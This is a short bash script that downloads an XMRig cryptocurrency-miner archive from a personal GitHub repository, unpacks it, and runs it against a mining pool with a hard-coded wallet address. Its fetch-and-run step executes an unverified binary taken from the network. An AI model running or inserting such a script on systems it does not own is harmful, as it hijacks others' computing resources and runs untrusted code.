#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.salvium.herominers.com:1230 -u SaLvs7pPAPWEAermUcMkwE2BXJT1EgoThTtNDPCtHmPSfy28j9wZ8EWCfHUdEZVCSCJ7uasGyKbeyQanMAiwiyd8TgK5HtGLsNW -p korea -a rx/0
